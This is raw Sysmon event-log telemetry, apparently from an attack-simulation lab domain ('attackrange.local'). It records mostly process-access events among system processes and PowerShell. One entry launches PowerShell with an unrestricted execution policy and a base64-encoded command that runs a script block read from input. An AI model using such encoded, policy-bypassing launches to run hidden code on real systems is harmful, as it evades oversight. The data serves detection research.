13:33:17.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E1D-6005-C702-00000000A201}5024C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8E1D-6005-C602-00000000A201}36764856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E1D-6005-C702-00000000A201}5024C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+955532a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9
cbeaa40\System.Management.Automation.ni.dll+949f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+954a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+94a12e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+954a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\Sys
tem.Management.Automation.ni.dll+949dac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949da232(wow64) 154100x8000000000000000243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.755{59A5CD1D-8E1D-6005-C702-00000000A201}5024C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1D-6005-C64B-100000000000}0x104bc60HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 
10341000x8000000000000000242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.684{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.684{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.653{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3tkaml4d.nll.ps12021-01-18 13:33:17.653 10341000x8000000000000000239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.637{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.606{59A5CD1D-8E1D-6005-C302-00000000A201}48324960C:\Windows\system32\conhost.exe{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.606{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.606{59A5CD1D-8E1D-6005-C502-00000000A201}22564640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+955532a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll